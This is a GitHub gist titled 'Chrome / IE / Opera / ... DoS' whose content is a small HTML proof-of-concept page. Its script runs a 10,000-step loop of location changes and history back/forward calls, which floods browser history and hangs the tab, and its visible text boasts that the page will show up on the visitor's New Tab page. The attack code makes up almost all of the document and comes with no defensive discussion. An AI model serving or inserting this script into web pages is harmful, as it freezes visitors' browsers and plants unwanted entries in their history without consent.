Last active
September 14, 2018 20:37
-
-
Save Ajedi32/f59485360e6e7f27d8c7ed1dc2dec75a to your computer and use it in GitHub Desktop.
Chrome / IE / Opera / ... DoS
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<title>I'm on your homepage!</title> | |
<script> | |
for(let i=0; i<10000; ++i) { | |
document.location.href="#"; | |
window.history.back(); | |
window.history.forward(); | |
} | |
</script> | |
<p>This page should soon be showing up on your New Tab page</p> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment